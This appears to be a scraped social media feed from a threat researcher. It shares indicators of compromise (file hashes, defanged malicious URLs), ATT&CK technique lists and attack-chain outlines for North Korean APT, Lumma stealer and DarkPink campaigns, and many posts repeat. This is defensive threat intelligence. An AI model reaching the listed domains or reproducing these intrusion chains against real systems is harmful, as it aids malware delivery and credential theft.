Aaron Jornet
@rexorvc0.bsky.social
Threat Researcher at @socradar | Malware Researcher | Threat Hunter | CTI ¦ Former @ElevenPaths @Panda_Security
rexorvc0.com
twitter.com/RexorVc0
rexorvc0.com
twitter.com/RexorVc0
#IOC
936888d84b33f152d39ec539f5ce71aa
5adfa76b72236bf017f7968fd012e968
3323777ca4ac2dc2c39f5c55c0c54e3c
f3c087a0be0687afd78829cab2d3bc2b
ee7e3e39dd951f352c669f64bd8ec1b5
144928fc87e1d50f5ed162bb1651ab24
0253b33cfb3deb6a1d4bb197895c4530
[...]
VT: virustotal.com/gui/collecti...
936888d84b33f152d39ec539f5ce71aa
5adfa76b72236bf017f7968fd012e968
3323777ca4ac2dc2c39f5c55c0c54e3c
f3c087a0be0687afd78829cab2d3bc2b
ee7e3e39dd951f352c669f64bd8ec1b5
144928fc87e1d50f5ed162bb1651ab24
0253b33cfb3deb6a1d4bb197895c4530
[...]
VT: virustotal.com/gui/collecti...
February 20, 2025 at 7:16 AM
#IOC
936888d84b33f152d39ec539f5ce71aa
5adfa76b72236bf017f7968fd012e968
3323777ca4ac2dc2c39f5c55c0c54e3c
f3c087a0be0687afd78829cab2d3bc2b
ee7e3e39dd951f352c669f64bd8ec1b5
144928fc87e1d50f5ed162bb1651ab24
0253b33cfb3deb6a1d4bb197895c4530
[...]
VT: virustotal.com/gui/collecti...
936888d84b33f152d39ec539f5ce71aa
5adfa76b72236bf017f7968fd012e968
3323777ca4ac2dc2c39f5c55c0c54e3c
f3c087a0be0687afd78829cab2d3bc2b
ee7e3e39dd951f352c669f64bd8ec1b5
144928fc87e1d50f5ed162bb1651ab24
0253b33cfb3deb6a1d4bb197895c4530
[...]
VT: virustotal.com/gui/collecti...
#TTP
📩[T1566.001] Spear-Phishing
📇[T1027.012] LNK file
📜[T1059] PS & BAT script execution
🔃[T1620] Load SC (.BAT execution)
🧩[T1140] Decrypt PE (#RokRat)
🗑️[T1070] Delete traces of Samples | Scripts
📡[T1071.001] C&C
📩[T1566.001] Spear-Phishing
📇[T1027.012] LNK file
📜[T1059] PS & BAT script execution
🔃[T1620] Load SC (.BAT execution)
🧩[T1140] Decrypt PE (#RokRat)
🗑️[T1070] Delete traces of Samples | Scripts
📡[T1071.001] C&C
February 20, 2025 at 7:16 AM
#TTP
📩[T1566.001] Spear-Phishing
📇[T1027.012] LNK file
📜[T1059] PS & BAT script execution
🔃[T1620] Load SC (.BAT execution)
🧩[T1140] Decrypt PE (#RokRat)
🗑️[T1070] Delete traces of Samples | Scripts
📡[T1071.001] C&C
📩[T1566.001] Spear-Phishing
📇[T1027.012] LNK file
📜[T1059] PS & BAT script execution
🔃[T1620] Load SC (.BAT execution)
🧩[T1140] Decrypt PE (#RokRat)
🗑️[T1070] Delete traces of Samples | Scripts
📡[T1071.001] C&C
#APT #APT37 #RicochetChollima #ScarCruft #RokRat #threat #malware
📍🇰🇵
💥🇰🇷🌏
⛓️#Phishing > RAR|ZIP > #LNK extract .bat/PS/DOCs > #PS > #BAT execution > #PS decrypt #RokRat SC > Load + RUN #RAT> #C2
🔗360 Advanced Threat Research: mp.weixin.qq.com/s?__biz=MzUy...
📍🇰🇵
💥🇰🇷🌏
⛓️#Phishing > RAR|ZIP > #LNK extract .bat/PS/DOCs > #PS > #BAT execution > #PS decrypt #RokRat SC > Load + RUN #RAT> #C2
🔗360 Advanced Threat Research: mp.weixin.qq.com/s?__biz=MzUy...
February 20, 2025 at 7:16 AM
#APT #APT37 #RicochetChollima #ScarCruft #RokRat #threat #malware
📍🇰🇵
💥🇰🇷🌏
⛓️#Phishing > RAR|ZIP > #LNK extract .bat/PS/DOCs > #PS > #BAT execution > #PS decrypt #RokRat SC > Load + RUN #RAT> #C2
🔗360 Advanced Threat Research: mp.weixin.qq.com/s?__biz=MzUy...
📍🇰🇵
💥🇰🇷🌏
⛓️#Phishing > RAR|ZIP > #LNK extract .bat/PS/DOCs > #PS > #BAT execution > #PS decrypt #RokRat SC > Load + RUN #RAT> #C2
🔗360 Advanced Threat Research: mp.weixin.qq.com/s?__biz=MzUy...
#IOC
48c179680e0b37d0262f7a402860b2a7
8ebca0b7ef7dbfc14da3ee39f478e880
1bb8b1d0282727ab9bc2deb3570cf272
bc14c3ab8316e7ec373829ea7a6e2166
61279d5e30f493bbdae9eab8ca99e9a4
2a8e4281213e4aaa485612f9ded261a2
457bb40c6fc10b3cd5a3b51e4eb672b2
...
🔗VT: virustotal.com/gui/collecti...
48c179680e0b37d0262f7a402860b2a7
8ebca0b7ef7dbfc14da3ee39f478e880
1bb8b1d0282727ab9bc2deb3570cf272
bc14c3ab8316e7ec373829ea7a6e2166
61279d5e30f493bbdae9eab8ca99e9a4
2a8e4281213e4aaa485612f9ded261a2
457bb40c6fc10b3cd5a3b51e4eb672b2
...
🔗VT: virustotal.com/gui/collecti...
January 22, 2025 at 8:56 AM
#IOC
48c179680e0b37d0262f7a402860b2a7
8ebca0b7ef7dbfc14da3ee39f478e880
1bb8b1d0282727ab9bc2deb3570cf272
bc14c3ab8316e7ec373829ea7a6e2166
61279d5e30f493bbdae9eab8ca99e9a4
2a8e4281213e4aaa485612f9ded261a2
457bb40c6fc10b3cd5a3b51e4eb672b2
...
🔗VT: virustotal.com/gui/collecti...
48c179680e0b37d0262f7a402860b2a7
8ebca0b7ef7dbfc14da3ee39f478e880
1bb8b1d0282727ab9bc2deb3570cf272
bc14c3ab8316e7ec373829ea7a6e2166
61279d5e30f493bbdae9eab8ca99e9a4
2a8e4281213e4aaa485612f9ded261a2
457bb40c6fc10b3cd5a3b51e4eb672b2
...
🔗VT: virustotal.com/gui/collecti...
#Lazarus #LabyrinthChollima #HiddenCobra APT-C-26 #Threat #APT #malware
📍🇰🇵
💥🌏
⛓️ Social media mal delivery > Exe (Electron #bot) > .js compress > steal wallet info > Download plugins+Run > Monitor host & steal info > #C2
🔗360 Advanced TRI: mp.weixin.qq.com/s?__biz=MzUy...
📍🇰🇵
💥🌏
⛓️ Social media mal delivery > Exe (Electron #bot) > .js compress > steal wallet info > Download plugins+Run > Monitor host & steal info > #C2
🔗360 Advanced TRI: mp.weixin.qq.com/s?__biz=MzUy...
January 22, 2025 at 8:56 AM
#Lazarus #LabyrinthChollima #HiddenCobra APT-C-26 #Threat #APT #malware
📍🇰🇵
💥🌏
⛓️ Social media mal delivery > Exe (Electron #bot) > .js compress > steal wallet info > Download plugins+Run > Monitor host & steal info > #C2
🔗360 Advanced TRI: mp.weixin.qq.com/s?__biz=MzUy...
📍🇰🇵
💥🌏
⛓️ Social media mal delivery > Exe (Electron #bot) > .js compress > steal wallet info > Download plugins+Run > Monitor host & steal info > #C2
🔗360 Advanced TRI: mp.weixin.qq.com/s?__biz=MzUy...
#IOC
https[:]//kankrfilez.b-cdn[.]net/
https[:]//new64.oss-ap-southeast-1.aliyuncs[.]com/
https[:]//getfilet23.b-cdn[.]net/
https[:]//denek.local-wanderer[.]shop
[...]
🔗Graph:https://virustotal.com/graph/embed/g36af090df0bc429a9b41822134061dab94f7052689f84f38a2b276e8ce31f3a4?theme=dark
https[:]//kankrfilez.b-cdn[.]net/
https[:]//new64.oss-ap-southeast-1.aliyuncs[.]com/
https[:]//getfilet23.b-cdn[.]net/
https[:]//denek.local-wanderer[.]shop
[...]
🔗Graph:https://virustotal.com/graph/embed/g36af090df0bc429a9b41822134061dab94f7052689f84f38a2b276e8ce31f3a4?theme=dark
December 20, 2024 at 6:07 AM
#IOC
https[:]//kankrfilez.b-cdn[.]net/
https[:]//new64.oss-ap-southeast-1.aliyuncs[.]com/
https[:]//getfilet23.b-cdn[.]net/
https[:]//denek.local-wanderer[.]shop
[...]
🔗Graph:https://virustotal.com/graph/embed/g36af090df0bc429a9b41822134061dab94f7052689f84f38a2b276e8ce31f3a4?theme=dark
https[:]//kankrfilez.b-cdn[.]net/
https[:]//new64.oss-ap-southeast-1.aliyuncs[.]com/
https[:]//getfilet23.b-cdn[.]net/
https[:]//denek.local-wanderer[.]shop
[...]
🔗Graph:https://virustotal.com/graph/embed/g36af090df0bc429a9b41822134061dab94f7052689f84f38a2b276e8ce31f3a4?theme=dark
#TTP
🤖[T1204.001] Mal Links using fake CAPTCHA
📜[T1059.001] PS execution
🧩[T1027] Obfuscated scripts | commands
📥[T1105] Download .txt | .mp4 obfuscated scripts
👥[T1218] Abuse of mshta or white files to load mw
💉[T1055] Inject into another process
📡[T1071] C&C
🤖[T1204.001] Mal Links using fake CAPTCHA
📜[T1059.001] PS execution
🧩[T1027] Obfuscated scripts | commands
📥[T1105] Download .txt | .mp4 obfuscated scripts
👥[T1218] Abuse of mshta or white files to load mw
💉[T1055] Inject into another process
📡[T1071] C&C
December 20, 2024 at 6:07 AM
#TTP
🤖[T1204.001] Mal Links using fake CAPTCHA
📜[T1059.001] PS execution
🧩[T1027] Obfuscated scripts | commands
📥[T1105] Download .txt | .mp4 obfuscated scripts
👥[T1218] Abuse of mshta or white files to load mw
💉[T1055] Inject into another process
📡[T1071] C&C
🤖[T1204.001] Mal Links using fake CAPTCHA
📜[T1059.001] PS execution
🧩[T1027] Obfuscated scripts | commands
📥[T1105] Download .txt | .mp4 obfuscated scripts
👥[T1218] Abuse of mshta or white files to load mw
💉[T1055] Inject into another process
📡[T1071] C&C
Tracking #Lumma & #Emmenhtal #loader through weeks targeting LATAM - #threat #malware
📍🏴
💥🇨🇴🇲🇽🇦🇷🌎
⛓️ #Link | Mal domain > Fake CAPTCHA | ZIP/RAR > Encoded PS | mshta (HTA) > download next > Obfuscated script exec > File | ZIP dropped > Injection over file > #LummaStealer
📍🏴
💥🇨🇴🇲🇽🇦🇷🌎
⛓️ #Link | Mal domain > Fake CAPTCHA | ZIP/RAR > Encoded PS | mshta (HTA) > download next > Obfuscated script exec > File | ZIP dropped > Injection over file > #LummaStealer
December 20, 2024 at 6:07 AM
Tracking #Lumma & #Emmenhtal #loader through weeks targeting LATAM - #threat #malware
📍🏴
💥🇨🇴🇲🇽🇦🇷🌎
⛓️ #Link | Mal domain > Fake CAPTCHA | ZIP/RAR > Encoded PS | mshta (HTA) > download next > Obfuscated script exec > File | ZIP dropped > Injection over file > #LummaStealer
📍🏴
💥🇨🇴🇲🇽🇦🇷🌎
⛓️ #Link | Mal domain > Fake CAPTCHA | ZIP/RAR > Encoded PS | mshta (HTA) > download next > Obfuscated script exec > File | ZIP dropped > Injection over file > #LummaStealer
#IOC
dd9146bf793ac34de3825bdabcd9f0f3 5504799eb0e7c186afcb07f7f50775b2 c5331b30587dcaf94bfde94040d4fc89 ac28e93dbf337e8d1cc14a3e7352f061 fefe7fb2072d755b0bfdf74aa7c9013e 6a3948a3602f11e58d8a9300d50984d6 91fb57a2a87ac72a5f65bc1123b02ef6
dd9146bf793ac34de3825bdabcd9f0f3 5504799eb0e7c186afcb07f7f50775b2 c5331b30587dcaf94bfde94040d4fc89 ac28e93dbf337e8d1cc14a3e7352f061 fefe7fb2072d755b0bfdf74aa7c9013e 6a3948a3602f11e58d8a9300d50984d6 91fb57a2a87ac72a5f65bc1123b02ef6
October 16, 2023 at 6:12 AM
#IOC
dd9146bf793ac34de3825bdabcd9f0f3 5504799eb0e7c186afcb07f7f50775b2 c5331b30587dcaf94bfde94040d4fc89 ac28e93dbf337e8d1cc14a3e7352f061 fefe7fb2072d755b0bfdf74aa7c9013e 6a3948a3602f11e58d8a9300d50984d6 91fb57a2a87ac72a5f65bc1123b02ef6
dd9146bf793ac34de3825bdabcd9f0f3 5504799eb0e7c186afcb07f7f50775b2 c5331b30587dcaf94bfde94040d4fc89 ac28e93dbf337e8d1cc14a3e7352f061 fefe7fb2072d755b0bfdf74aa7c9013e 6a3948a3602f11e58d8a9300d50984d6 91fb57a2a87ac72a5f65bc1123b02ef6
#TTP
[T1566.001] Spear-Phishing
[T1574.002] Dll side-loading
[T1190] Winrar exploit
[T1140] Decrypt info from fake PDF
[T1548.002] UAC bypass over \shell\open\command\ RegKey
[T1566.001] Spear-Phishing
[T1574.002] Dll side-loading
[T1190] Winrar exploit
[T1140] Decrypt info from fake PDF
[T1548.002] UAC bypass over \shell\open\command\ RegKey
October 16, 2023 at 6:11 AM
#TTP
[T1566.001] Spear-Phishing
[T1574.002] Dll side-loading
[T1190] Winrar exploit
[T1140] Decrypt info from fake PDF
[T1548.002] UAC bypass over \shell\open\command\ RegKey
[T1566.001] Spear-Phishing
[T1574.002] Dll side-loading
[T1190] Winrar exploit
[T1140] Decrypt info from fake PDF
[T1548.002] UAC bypass over \shell\open\command\ RegKey
#APT #DarkPink #Saaiwc CVE-2023-38831 #TelePowerBot #KamiKakaBot #threat #malware
#Phishing > RAR + #CVE > Dropp dll > Side-Loading > Injection > Persistence + UAC bypass > Telegram API connection
Nsfocus Report: blog.nsfocus.net/aptdarkpinkw...
#Phishing > RAR + #CVE > Dropp dll > Side-Loading > Injection > Persistence + UAC bypass > Telegram API connection
Nsfocus Report: blog.nsfocus.net/aptdarkpinkw...
October 16, 2023 at 6:10 AM
#APT #DarkPink #Saaiwc CVE-2023-38831 #TelePowerBot #KamiKakaBot #threat #malware
#Phishing > RAR + #CVE > Dropp dll > Side-Loading > Injection > Persistence + UAC bypass > Telegram API connection
Nsfocus Report: blog.nsfocus.net/aptdarkpinkw...
#Phishing > RAR + #CVE > Dropp dll > Side-Loading > Injection > Persistence + UAC bypass > Telegram API connection
Nsfocus Report: blog.nsfocus.net/aptdarkpinkw...